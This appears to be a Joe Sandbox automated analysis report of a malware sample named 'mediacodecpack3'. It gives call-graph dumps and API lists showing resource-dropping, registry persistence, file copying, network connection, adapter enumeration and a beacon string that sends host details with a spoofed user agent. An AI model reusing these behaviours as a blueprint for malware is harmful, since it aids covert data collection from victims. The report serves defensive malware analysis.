61089->61088 61092 2ba100e GetProcessHeap HeapFree 61089->61092 61090 2ba0fc9 61091 2ba0620 17 API calls 61090->61091 61094 2ba0fd8 61091->61094 61092->61088 61093 2ba1059 GetProcessHeap HeapFree 61093->61097 61094->61089 61095 2ba0fe5 TlsSetValue 61094->61095 61095->61089 61096 2ba104b GetProcessHeap HeapFree 61096->61093 61097->61089 61097->61090 61097->61093 61097->61096 61099 2ba31c3 61098->61099 61100 2ba31c5 IsProcessorFeaturePresent 61098->61100 61099->61069 61102 2ba814f 61100->61102 61108 2ba80fe 5 API calls 2 library calls 61102->61108 61104 2ba8232 61104->61069 61105->61075 61106->61081 61107->61074 61108->61104 61110 2b94d90 __EH_prolog 61109->61110 61111 2b9fb20 Mailbox 68 API calls 61110->61111 61112 2b94da6 RtlEnterCriticalSection RtlLeaveCriticalSection 61111->61112 61113 2b950d4 shared_ptr 61112->61113 61126 2b94dd1 std::bad_exception::bad_exception 61112->61126 61113->61084 61115 2b950a1 RtlEnterCriticalSection RtlLeaveCriticalSection 61116 2b950b3 RtlEnterCriticalSection RtlLeaveCriticalSection 61115->61116 61116->61113 61116->61126 61117 2b99729 73 API calls 61117->61126 61119 2b94e8d RtlEnterCriticalSection RtlLeaveCriticalSection 61120 2b94e9f RtlEnterCriticalSection RtlLeaveCriticalSection 61119->61120 61120->61126 61121 2b9bedd 73 API calls 61121->61126 61126->61115 61126->61116 61126->61117 61126->61119 61126->61120 61126->61121 61129 2b94bed 61126->61129 61153 2b96d28 60 API calls 61126->61153 61154 2b9c00f 60 API calls 2 library calls 61126->61154 61155 2b96d02 60 API calls std::bad_exception::bad_exception 61126->61155 61156 2b999b6 60 API calls 2 library calls 61126->61156 61157 2b99a8e 210 API calls 3 library calls 61126->61157 61158 2ba0900 GetProcessHeap HeapFree 61126->61158 61159 2b94100 GetProcessHeap HeapFree 61126->61159 61130 2b94bf7 __EH_prolog 61129->61130 61131 2b91ba7 209 API calls 61130->61131 61132 2b94c31 61131->61132 61160 2b93a94 61132->61160 61134 2b94c3c 61135 2b93a94 60 API calls 61134->61135 61136 2b94c56 61135->61136 61163 2b975d6 61136->61163 61141 2b9fb20 Mailbox 68 API calls 61142 2b94cb8 61141->61142 61188 2b9b294 61142->61188 61144 2b94ce1 InterlockedExchange 61192 2b92995 95 API calls Mailbox 61144->61192 61146 2b94d3c 61196 2b9761f 75 API calls 2 library calls 61146->61196 61149 2b94d06 61149->61146 61193 2b97592 76 API calls Mailbox 61149->61193 61194 2b972fc 82 API calls Mailbox 61149->61194 61195 2b92995 95 API calls Mailbox 61149->61195 61150 2b94d57 shared_ptr 61150->61126 61153->61126 61154->61126 61155->61126 61156->61126 61157->61126 61158->61126 61159->61126 61161 2b939ee 60 API calls 61160->61161 61162 2b93ab5 61161->61162 61162->61134 61164 2b9fb20 Mailbox 68 API calls 61163->61164 61165 2b975ec 61164->61165 61166 2b98a25 77 API calls 61165->61166 61167 2b97606 61166->61167 61168 2b91712 60 API calls 61167->61168 61169 2b94c8b 61168->61169 61170 2b9d0fc 61169->61170 61171 2b9d106 __EH_prolog 61170->61171 61172 2b91a01 61 API calls 61171->61172 61173 2b9d11d 61172->61173 61174 2b9fb20 Mailbox 68 API calls 61173->61174 61176 2b9d15a 61173->61176 61174->61176 61175 2b9d168 InterlockedExchangeAdd 61177 2b9d18a 61175->61177 61178 2b9d195 RtlEnterCriticalSection 61175->61178 61176->61175 61180 2b91ec7 InterlockedIncrement PostQueuedCompletionStatus RtlEnterCriticalSection InterlockedExchange RtlLeaveCriticalSection 61177->61180 61179 2b96f5f 60 API calls 61178->61179 61181 2b9d1bb InterlockedIncrement 61179->61181 61182 2b9d193 61180->61182 61183 2b9d1cb 61181->61183 61184 2b9d1d2 RtlLeaveCriticalSection 61181->61184 61186 2b9d856 TlsGetValue 61182->61186 61185 2b927f3 SetWaitableTimer 61183->61185 61184->61182 61185->61184 61187 2b94ca4 61186->61187 61187->61141 61189 2b9b2a7 61188->61189 61190 2b9b2d0 61189->61190 61191 2b9d9c5 83 API calls 61189->61191 61190->61144 61191->61190 61192->61149 61193->61149 61194->61149 61195->61149 61196->61150 61197->61056 61198->61059 61220 2b9353e 61199->61220 61203 2b92ae8 WSASetLastError connect 61202->61203 61204 2b92ad8 61202->61204 61206 2b9950d 69 API calls 61203->61206 61205 2b9fb20 Mailbox 68 API calls 61204->61205 61207 2b92add 61205->61207 61208 2b92b07 61206->61208 61210 2b9fb20 Mailbox 68 API calls 61207->61210 61208->61207 61209 2b9fb20 Mailbox 68 API calls 61208->61209 61209->61207 61211 2b92b1b 61210->61211 61212 2b9fb20 Mailbox 68 API calls 61211->61212 61214 2b92b38 61211->61214 61212->61214 61216 2b92b87 61214->61216 61253 2b93027 71 API calls Mailbox 61214->61253 61215 2b92b59 61215->61216 61254 2b92fb4 71 API calls Mailbox 61215->61254 61216->60720 61218 2b92b7a 61218->61216 61219 2b9fb20 Mailbox 68 API calls 61218->61219 61219->61216 61221 2b93548 __EH_prolog 61220->61221 61222 2b93557 61221->61222 61223 2b93576 61221->61223 61250 2b91996 68 API calls __cinit 61222->61250 61242 2b92edd WSASetLastError WSASocketA 61223->61242 61227 2b935ad CreateIoCompletionPort 61228 2b935db 61227->61228 61229 2b935c5 GetLastError 61227->61229 61231 2b9fb20 Mailbox 68 API calls 61228->61231 61230 2b9fb20 Mailbox 68 API calls 61229->61230 61232 2b935d2 61230->61232 61231->61232 61233 2b935ef 61232->61233 61234 2b93626 61232->61234 61235 2b9fb20 Mailbox 68 API calls 61233->61235 61252 2b9cef7 60 API calls 2 library calls 61234->61252 61236 2b93608 61235->61236 61251 2b929ee 76 API calls Mailbox 61236->61251 61239 2b93659 61241 2b9fb20 Mailbox 68 API calls 61239->61241 61240 2b9355f 61240->60716 61241->61240 61243 2b9fb20 Mailbox 68 API calls 61242->61243 61244 2b92f0a WSAGetLastError 61243->61244 61245 2b92f41 61244->61245 61246 2b92f21 61244->61246 61245->61227 61245->61240 61247 2b92f3c 61246->61247 61248 2b92f27 setsockopt 61246->61248 61249 2b9fb20 Mailbox 68 API calls 61247->61249 61248->61247 61249->61245 61250->61240 61251->61240 61252->61239 61253->61215 61254->61218 61255->60741 61256->60743 61257->60740 61258->60758 61259->60758 61261->60753 61262->60757 61263->60760 61264->60747 61265->60760 61266->60766 61267->60770 61268->60775 61270 2b9d00e __EH_prolog 61269->61270 61271 2ba27c5 _Allocate 60 API calls 61270->61271 61272 2b9d025 61271->61272 61272->60780 61273->60787 61274->60790 61275->60790 61276->60794 61278 2b9d33e __EH_prolog 61277->61278 61279 2ba27c5 _Allocate 60 API calls 61278->61279 61280 2b9d347 61279->61280 61281 2b91bfa RtlEnterCriticalSection 61280->61281 61283 2b9d555 61280->61283 61281->60799 61284 2b9d55f __EH_prolog 61283->61284 61287 2b926db RtlEnterCriticalSection 61284->61287 61286 2b9d5b5 61286->61281 61288 2b92728 CreateWaitableTimerA 61287->61288 61289 2b9277e 61287->61289 61290 2b92738 GetLastError 61288->61290 61291 2b9275b SetWaitableTimer 61288->61291 61292 2b927d5 RtlLeaveCriticalSection 61289->61292 61294 2ba27c5 _Allocate 60 API calls 61289->61294 61293 2b9fb20 Mailbox 68 API calls 61290->61293 61291->61289 61292->61286 61295 2b92745 61293->61295 61296 2b9278a 61294->61296 61331 2b91712 61295->61331 61298 2b927c8 61296->61298 61299 2ba27c5 _Allocate 60 API calls 61296->61299 61337 2b96e07 CloseHandle 61298->61337 61301 2b927a9 61299->61301 61303 2b91cf8 CreateEventA 61301->61303 61304 2b91d23 GetLastError 61303->61304 61305 2b91d52 CreateEventA 61303->61305 61308 2b91d33 61304->61308 61306 2b91d6b GetLastError 61305->61306 61325 2b91d96 61305->61325 61310 2b91d7b 61306->61310 61307 2ba23c9 __beginthreadex 201 API calls 61311 2b91db6 61307->61311 61309 2b9fb20 Mailbox 68 API calls 61308->61309 61312 2b91d3c 61309->61312 61313 2b9fb20 Mailbox 68 API calls 61310->61313 61314 2b91e0d 61311->61314 61315 2b91dc6 GetLastError 61311->61315 61316 2b91712 60 API calls 61312->61316 61317 2b91d84 61313->61317 61318 2b91e1d 61314->61318 61319 2b91e11 WaitForSingleObject CloseHandle 61314->61319 61320 2b91dd8 61315->61320 61321 2b91d4e 61316->61321 61322 2b91712 60 API calls 61317->61322 61318->61298 61319->61318 61323 2b91ddc CloseHandle 61320->61323 61324 2b91ddf 61320->61324 61321->61305 61322->61325 61323->61324 61326 2b91de9 CloseHandle 61324->61326 61327 2b91dee 61324->61327 61325->61307 61326->61327 61328 2b9fb20 Mailbox 68 API calls 61327->61328 61329 2b91dfb 61328->61329 61330 2b91712 60 API calls 61329->61330 61330->61314 61332 2b9171c __EH_prolog 61331->61332 61333 2b9173e 61332->61333 61338 2b91815 59 API calls std::exception::exception 61332->61338 61333->61291 61335 2b91732 61339 2b994a6 60 API calls 2 library calls 61335->61339 61337->61292 61338->61335 61351 2b930ae WSASetLastError 61340->61351 61343 2b930ae 71 API calls 61344 2b93c90 61343->61344 61345 2b916ae 61344->61345 61346 2b916b8 __EH_prolog 61345->61346 61347 2b91701 61346->61347 61367 2ba14e3 59 API calls std::exception::_Copy_str 61346->61367 61347->60650 61349 2b916dc 61368 2b994a6 60 API calls 2 library calls 61349->61368 61352 2b930ec WSAStringToAddressA 61351->61352 61353 2b930ce 61351->61353 61354 2b9950d 69 API calls 61352->61354 61353->61352 61355 2b930d3 61353->61355 61356 2b93114 61354->61356 61357 2b9fb20 Mailbox 68 API calls 61355->61357 61358 2b9311e _memcmp 61356->61358 61359 2b93154 61356->61359 61360 2b930d8 61357->61360 61361 2b93135 61358->61361 61364 2b9fb20 Mailbox 68 API calls 61358->61364 61359->61361 61362 2b9fb20 Mailbox 68 API calls 61359->61362 61360->61343 61360->61344 61363 2b9fb20 Mailbox 68 API calls 61361->61363 61365 2b93193 61361->61365 61362->61361 61363->61365 61364->61361 61365->61360 61366 2b9fb20 Mailbox 68 API calls 61365->61366 61366->61360 61367->61349 61369->60813 61370->60814 61621 40232e Sleep 61622 40209b 61621->61622 61623 40d55c GetStartupInfoA 61622->61623 61625 401f74 61622->61625 61623->61625 61624 40d720 61625->61624 61626 401301 7 API calls 61625->61626 61627 40dc0d 61626->61627 61371 4016cf 61375 401897 61371->61375 61376 401d22 61375->61376 61377 40d55c GetStartupInfoA 61376->61377 61379 401f74 61376->61379 61377->61379 61378 40d720 61379->61378 61382 401301 FindResourceA 61379->61382 61381 40dc0d 61383 401367 SizeofResource 61382->61383 61388 401360 61382->61388 61384 401386 LoadResource LockResource GlobalAlloc 61383->61384 61383->61388 61385 4013cc 61384->61385 61386 40141f GetTickCount 61385->61386 61389 40142a GlobalAlloc 61386->61389 61388->61381 61389->61388 61628 2bcc80e 61629 2bcc812 61628->61629 61632 2b9e9ab LoadLibraryA 61629->61632 61630 2bcc817 61630->61630 61633 2b9ea8e 61632->61633 61634 2b9e9d4 GetProcAddress 61632->61634 61633->61630 61635 2b9ea87 FreeLibrary 61634->61635 61639 2b9e9e8 61634->61639 61635->61633 61636 2b9e9fa GetAdaptersInfo 61636->61639 61637 2b9ea82 61637->61635 61638 2ba27c5 _Allocate 60 API calls 61638->61639 61639->61636 61639->61637 61639->61638 61390 2bcc5af SHGetSpecialFolderPathA 61391 2bd07ce 61390->61391 61392 401b93 RegSetValueExA RegCloseKey 61393 40d143 61392->61393 61640 2b9104d 61641 2ba23b4 __cinit 68 API calls 61640->61641 61642 2b91057 61641->61642 61645 2b91aa9 InterlockedIncrement 61642->61645 61646 2b9105c 61645->61646 61647 2b91ac5 WSAStartup InterlockedExchange 61645->61647 61647->61646 61394 2c04616 61395 2c17646 InternetOpenA 61394->61395 61397 401e96 CreateDirectoryA 61398 40d036 61397->61398 61399 40d9d8 RegOpenKeyExA 61648 401878 RegCloseKey 61649 40dcf0 61648->61649 61649->61649 61400 401cdb CopyFileA 61650 40207b 61654 2ba2988 61650->61654 61655 2ba2991 61654->61655 61656 2ba2996 61654->61656 61668 2ba918c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 61655->61668 61660 2ba29ab 61656->61660 61659 402080 Sleep 61661 2ba29b7 __ioinit 61660->61661 61663 2ba2a62 __ioinit 61661->61663 61665 2ba2a05 ___DllMainCRTStartup 61661->61665 61669 2ba2816 61661->61669 61663->61659 61664 2ba2816 __CRT_INIT@12 138 API calls 61664->61663 61665->61663 61666 2ba2816 __CRT_INIT@12 138 API calls 61665->61666 61667 2ba2a3f 61665->61667 61666->61667 61667->61663 61667->61664 61668->61656 61670 2ba2822 __ioinit 61669->61670 61671 2ba282a 61670->61671 61672 2ba28a4 61670->61672 61717 2ba6e56 GetProcessHeap 61671->61717 61674 2ba28a8 61672->61674 61675 2ba290d 61672->61675 61679 2ba28c9 61674->61679 61707 2ba2833 __ioinit __CRT_INIT@12 61674->61707 61806 2ba7019 59 API calls _doexit 61674->61806 61676 2ba2912 61675->61676 61677 2ba2970 61675->61677 61680 2ba7d8b __threadstartex@4 TlsGetValue 61676->61680 61677->61707 61812 2ba4894 59 API calls 2 library calls 61677->61812 61678 2ba282f 61678->61707 61718 2ba4a04 61678->61718 61807 2ba6ef0 61 API calls _free 61679->61807 61685 2ba291d 61680->61685 61688 2ba762a __calloc_crt 59 API calls 61685->61688 61685->61707 61686 2ba28ce 61689 2ba28df __CRT_INIT@12 61686->61689 61808 2ba8e2a 60 API calls _free 61686->61808 61687 2ba283f __RTC_Initialize 61694 2ba284f GetCommandLineA 61687->61694 61687->61707 61690 2ba292e 61688->61690 61810 2ba28f8 62 API calls __mtterm 61689->61810 61690->61707 61811 2ba7daa TlsSetValue 61690->61811 61693 2ba28da 61809 2ba4a7a 62 API calls 2 library calls 61693->61809 61739 2ba9228 GetEnvironmentStringsW 61694->61739 61698 2ba2946 61700 2ba294c 61698->61700 61701 2ba2964 61698->61701 61703 2ba4951 __initptd 59 API calls 61700->61703 61704 2ba1f84 _free 59 API calls 61701->61704 61706 2ba2954 GetCurrentThreadId 61703->61706 61704->61707 61705 2ba2869 61708 2ba286d 61705->61708 61771 2ba8e7c 61705->61771 61706->61707 61707->61665 61804 2ba4a7a 62 API calls 2 library calls 61708->61804 61712 2ba288d 61712->61707 61805 2ba8e2a 60 API calls _free 61712->61805 61717->61678 61813 2ba70c0 36 API calls 2 library calls 61718->61813 61720 2ba4a09 61814 2ba75dc InitializeCriticalSectionAndSpinCount __ioinit 61720->61814 61722 2ba4a0e 61723 2ba4a12 61722->61723 61816 2ba7d4e TlsAlloc 61722->61816 61815 2ba4a7a 62 API calls 2 library calls 61723->61815 61726 2ba4a24 61726->61723 61728 2ba4a2f 61726->61728 61727 2ba4a17 61727->61687 61729 2ba762a __calloc_crt 59 API calls 61728->61729 61730 2ba4a3c 61729->61730 61731 2ba4a71 61730->61731 61817 2ba7daa TlsSetValue 61730->61817 61818 2ba4a7a 62 API calls 2 library calls 61731->61818 61734 2ba4a50 61734->61731 61736 2ba4a56 61734->61736 61735 2ba4a76 61735->61687 61737 2ba4951 __initptd 59 API calls 61736->61737 61738 2ba4a5e GetCurrentThreadId 61737->61738 61738->61687 61741 2ba923b 61739->61741 61744 2ba285f 61739->61744 61740 2ba9253 WideCharToMultiByte 61742 2ba926e 61740->61742 61743 2ba92a5 FreeEnvironmentStringsW 61740->61743 61741->61740 61741->61741 61819 2ba7672 59 API calls 2 library calls 61742->61819 61743->61744 61752 2ba8b76 61744->61752 61746 2ba9274 61746->61743 61747 2ba927b WideCharToMultiByte 61746->61747 61748 2ba929a FreeEnvironmentStringsW 61747->61748 61749 2ba9291 61747->61749 61748->61744 61750 2ba1f84 _free 59 API calls 61749->61750 61751 2ba9297 61750->61751 61751->61748 61753 2ba8b82 __ioinit 61752->61753 61754 2ba74ab __lock 59 API calls 61753->61754 61755 2ba8b89 61754->61755 61756 2ba762a __calloc_crt 59 API calls 61755->61756 61757 2ba8b9a 61756->61757 61758 2ba8c05 GetStartupInfoW 61757->61758 61759 2ba8ba5 __ioinit @_EH4_CallFilterFunc@8 61757->61759 61760 2ba8d49 61758->61760 61767 2ba8c1a 61758->61767 61759->61705 61761 2ba8e11 61760->61761 61765 2ba8d96 GetStdHandle 61760->61765 61766 2ba8da9 GetFileType 61760->61766 61821 2ba7dcc InitializeCriticalSectionAndSpinCount 61760->61821 61822 2ba8e21 RtlLeaveCriticalSection _doexit 61761->61822 61763 2ba8c68 61763->61760 61768 2ba8c9c GetFileType 61763->61768 61820 2ba7dcc InitializeCriticalSectionAndSpinCount 61763->61820 61764 2ba762a __calloc_crt 59 API calls 61764->61767 61765->61760 61766->61760 61767->61760 61767->61763 61767->61764 61768->61763 61772 2ba8e8a 61771->61772 61773 2ba8e8f GetModuleFileNameA 61771->61773 61829 2ba3efa 71 API calls __setmbcp 61772->61829 61775 2ba8ebc 61773->61775 61823 2ba8f2f 61775->61823 61777 2ba2879 61777->61712 61782 2ba90ab 61777->61782 61780 2ba8ef5 61780->61777 61781 2ba8f2f _parse_cmdline 59 API calls 61780->61781 61781->61777 61783 2ba90b4 61782->61783 61785 2ba90b9 _strlen 61782->61785 61833 2ba3efa 71 API calls __setmbcp 61783->61833 61786 2ba762a __calloc_crt 59 API calls 61785->61786 61789 2ba2882 61785->61789 61794 2ba90ef _strlen 61786->61794 61787 2ba9141 61788 2ba1f84 _free 59 API calls 61787->61788 61788->61789 61789->61712 61798 2ba7028 61789->61798 61790 2ba762a __calloc_crt 59 API calls 61790->61794 61791 2ba9168 61793 2ba1f84 _free 59 API calls 61791->61793 61793->61789 61794->61787 61794->61789 61794->61790 61794->61791 61795 2ba917f 61794->61795 61834 2ba592c 59 API calls 2 library calls 61794->61834 61835 2ba3b75 8 API calls 2 library calls 61795->61835 61797 2ba918b 61799 2ba7034 __IsNonwritableInCurrentImage 61798->61799 61836 2baab8f 61799->61836 61801 2ba7052 __initterm_e 61802 2ba23b4 __cinit 68 API calls 61801->61802 61803 2ba7071 _doexit __IsNonwritableInCurrentImage 61801->61803 61802->61803 61803->61712 61804->61707 61805->61708 61806->61679 61807->61686 61808->61693 61809->61689 61810->61707 61811->61698 61812->61707 61813->61720 61814->61722 61815->61727 61816->61726 61817->61734 61818->61735 61819->61746 61820->61763 61821->61760 61822->61759 61825 2ba8f51 61823->61825 61828 2ba8fb5 61825->61828 61831 2baef96 59 API calls x_ismbbtype_l 61825->61831 61826 2ba8ed2 61826->61777 61830 2ba7672 59 API calls 2 library calls 61826->61830 61828->61826 61832 2baef96 59 API calls x_ismbbtype_l 61828->61832 61829->61773 61830->61780 61831->61825 61832->61828 61833->61785 61834->61794 61835->61797 61837 2baab92 RtlEncodePointer 61836->61837 61837->61837 61838 2baabac 61837->61838 61838->61801 61401 2b9e8a7 CreateFileA 61402 2b9e9a3 61401->61402 61406 2b9e8d8 61401->61406 61403 2b9e8f0 DeviceIoControl 61403->61406 61404 2b9e999 CloseHandle 61404->61402 61405 2b9e965 GetLastError 61405->61404 61405->61406 61406->61403 61406->61404 61406->61405 61406->61406 61407 2ba27c5 _Allocate 60 API calls 61406->61407 61407->61406

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 238 2b95e5e-2b960ec RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2b942c7 GetTickCount call 2b959fa GetVersionExA call 2ba3760 call 2ba1fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2ba3760 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2ba1fbc * 4 QueryPerformanceCounter Sleep call 2ba1fbc * 2 call 2ba3760 * 2 283 2b960f0-2b960f2 238->283 284 2b960fb-2b960fd 283->284 285 2b960f4-2b960f9 283->285 287 2b9610a-2b96448 RtlEnterCriticalSection RtlLeaveCriticalSection 284->287 288 2b960ff 284->288 286 2b96104 Sleep 285->286 286->287 290 2b9644a-2b96450 287->290 291 2b96464-2b9646e 287->291 288->286 292 2b96452-2b96454 290->292 293 2b96456-2b96463 call 2b9534d 290->293 291->283 294 2b96474-2b96498 call 2ba3760 call 2b9439c 291->294 292->291 293->291 294->283 301 2b9649e-2b964c9 RtlEnterCriticalSection RtlLeaveCriticalSection call 2ba134c 294->301 304 2b964cb-2b964da call 2ba134c 301->304 305 2b96513-2b9652b call 2ba134c 301->305 304->305 312 2b964dc-2b964eb call 2ba134c 304->312 310 2b96531-2b96533 305->310 311 2b967d2-2b967e1 call 2ba134c 305->311 310->311 314 2b96539-2b965e4 call 2ba1fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2ba3760 * 5 call 2b9439c * 2 310->314 319 2b967e3-2b967e5 311->319 320 2b96826-2b96835 call 2ba134c 311->320 312->305 322 2b964ed-2b964fc call 2ba134c 312->322 364 2b96621 314->364 365 2b965e6-2b965e8 314->365 319->320 323 2b967e7-2b96821 call 2ba3760 RtlEnterCriticalSection RtlLeaveCriticalSection 319->323 333 2b9684a-2b96859 call 2ba134c 320->333 334 2b96837-2b96840 call 2b95c11 call 2b95d1f 320->334 322->305 335 2b964fe-2b9650d call 2ba134c 322->335 323->283 333->283 344 2b9685f-2b96861 333->344 347 2b96845 334->347 335->283 335->305 344->283 348 2b96867-2b96880 call 2b9439c 344->348 347->283 348->283 355 2b96886-2b96955 call 2ba1428 call 2b91ba7 348->355 366 2b9695c-2b9697d RtlEnterCriticalSection 355->366 367 2b96957 call 2b9143f 355->367 371 2b96625-2b96653 call 2ba1fbc call 2ba3760 call 2b9439c 364->371 365->364 370 2b965ea-2b965fc call 2ba134c 365->370 368 2b96989-2b969f0 RtlLeaveCriticalSection call 2b93c67 call 2b93d7e call 2b9733f 366->368 369 2b9697f-2b96986 366->369 367->366 392 2b96b58-2b96b6c call 2b98007 368->392 393 2b969f6-2b96a38 call 2b99729 368->393 369->368 370->364 381 2b965fe-2b9661f call 2b9439c 370->381 390 2b96655-2b96664 call 2ba25f6 371->390 391 2b96694-2b9669d call 2ba1f84 371->391 381->371 390->391 404 2b96666 390->404 402 2b967c0-2b967cd 391->402 403 2b966a3-2b966bb call 2ba27c5 391->403 392->283 405 2b96a3e-2b96a45 393->405 406 2b96b22-2b96b33 call 2b973ee 393->406 402->283 415 2b966bd-2b966c5 call 2b9873b 403->415 416 2b966c7 403->416 408 2b9666b-2b9667d call 2ba1860 404->408 410 2b96a48-2b96a4d 405->410 413 2b96b38-2b96b53 call 2b933b2 406->413 422 2b9667f 408->422 423 2b96682-2b96692 call 2ba25f6 408->423 410->410 414 2b96a4f-2b96a94 call 2b99729 410->414 413->392 414->406 425 2b96a9a-2b96aa0 414->425 421 2b966c9-2b96757 call 2b99853 call 2b93863 call 2b95119 call 2b93863 call 2b99af9 call 2b99c13 415->421 416->421 447 2b9675c-2b9676d 421->447 422->423 423->391 423->408 429 2b96aa3-2b96aa8 425->429 429->429 432 2b96aaa-2b96ae5 call 2b99729 429->432 432->406 438 2b96ae7-2b96b1b call 2b9c11b 432->438 443 2b96b20-2b96b21 438->443 443->406 448 2b9676f call 2b9380b 447->448 449 2b96774-2b9679f Sleep call 2ba0900 447->449 448->449 453 2b967ab-2b967b9 449->453 454 2b967a1-2b967aa call 2b94100 449->454 453->402 456 2b967bb call 2b9380b 453->456 454->453 456->402
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.NTDLL(02BC4FD0), ref: 02B95E92
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02B95EA9
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02B95EB2
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02B95EC1
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02B95EC4
                                                                                            • GetTickCount.KERNEL32 ref: 02B95ED8
                                                                                              • Part of subcall function 02B959FA: _malloc.LIBCMT ref: 02B95A08
                                                                                            • GetVersionExA.KERNEL32(02BC4E20), ref: 02B95F05
                                                                                            • _malloc.LIBCMT ref: 02B95F31
                                                                                              • Part of subcall function 02BA1FBC: __FF_MSGBANNER.LIBCMT ref: 02BA1FD3
                                                                                              • Part of subcall function 02BA1FBC: __NMSG_WRITE.LIBCMT ref: 02BA1FDA
                                                                                              • Part of subcall function 02BA1FBC: RtlAllocateHeap.NTDLL(007C0000,00000000,00000001), ref: 02BA1FFF
                                                                                            • _malloc.LIBCMT ref: 02B95F41
                                                                                            • _malloc.LIBCMT ref: 02B95F4C
                                                                                            • _malloc.LIBCMT ref: 02B95F57
                                                                                            • _malloc.LIBCMT ref: 02B95F62
                                                                                            • _malloc.LIBCMT ref: 02B95F6D
                                                                                            • _malloc.LIBCMT ref: 02B95F78
                                                                                            • _malloc.LIBCMT ref: 02B95F84
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02B95F9B
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02B95FA4
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02B95FB0
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02B95FB3
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02B95FBE
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02B95FC1
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B95FF8
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B96005
                                                                                            • _malloc.LIBCMT ref: 02B96026
                                                                                            • _malloc.LIBCMT ref: 02B96034
                                                                                            • _malloc.LIBCMT ref: 02B9603B
                                                                                            • _malloc.LIBCMT ref: 02B9605C
                                                                                            • QueryPerformanceCounter.KERNEL32(00000200), ref: 02B96068
                                                                                            • Sleep.KERNELBASE(00000000), ref: 02B96076
                                                                                            • _malloc.LIBCMT ref: 02B96082
                                                                                            • _malloc.LIBCMT ref: 02B96092
                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02B96104
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B9610F
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B96120
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$OQ$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                            • API String ID: 4273019447-1738318132
                                                                                            • Opcode ID: d0e3d35ccdadefa9ce1ea79706057a80011bafce15efcf2a1893262fdeb597c5
                                                                                            • Instruction ID: b46901e65805a1d19e67e767a5af7455536e8e381697446f6fad80615c54c5f0
                                                                                            • Opcode Fuzzy Hash: d0e3d35ccdadefa9ce1ea79706057a80011bafce15efcf2a1893262fdeb597c5
                                                                                            • Instruction Fuzzy Hash: 9A71E2B1D4C3809FE321AF38AC65B5BBBE8AF59350F5009ADF58897341DBB459008F96

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 791 2b9e9ab-2b9e9ce LoadLibraryA 792 2b9ea8e-2b9ea95 791->792 793 2b9e9d4-2b9e9e2 GetProcAddress 791->793 794 2b9e9e8-2b9e9f8 793->794 795 2b9ea87-2b9ea88 FreeLibrary 793->795 796 2b9e9fa-2b9ea06 GetAdaptersInfo 794->796 795->792 797 2b9ea08 796->797 798 2b9ea3e-2b9ea46 796->798 799 2b9ea0a-2b9ea11 797->799 800 2b9ea48-2b9ea4e call 2ba26df 798->800 801 2b9ea4f-2b9ea54 798->801 802 2b9ea1b-2b9ea23 799->802 803 2b9ea13-2b9ea17 799->803 800->801 805 2b9ea82-2b9ea86 801->805 806 2b9ea56-2b9ea59 801->806 809 2b9ea26-2b9ea2b 802->809 803->799 808 2b9ea19 803->808 805->795 806->805 807 2b9ea5b-2b9ea60 806->807 811 2b9ea6d-2b9ea78 call 2ba27c5 807->811 812 2b9ea62-2b9ea6a 807->812 808->798 809->809 813 2b9ea2d-2b9ea3a call 2b9e6fa 809->813 811->805 818 2b9ea7a-2b9ea7d 811->818 812->811 813->798 818->796
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 02B9E9C1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02B9E9DA
                                                                                            • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02B9E9FF
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 02B9EA88
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                            • API String ID: 514930453-3114217049
                                                                                            • Opcode ID: 335704bfa687c38aceaefb30423917ec5f7f7f1044a2e313b4b8f30b72fb38a5
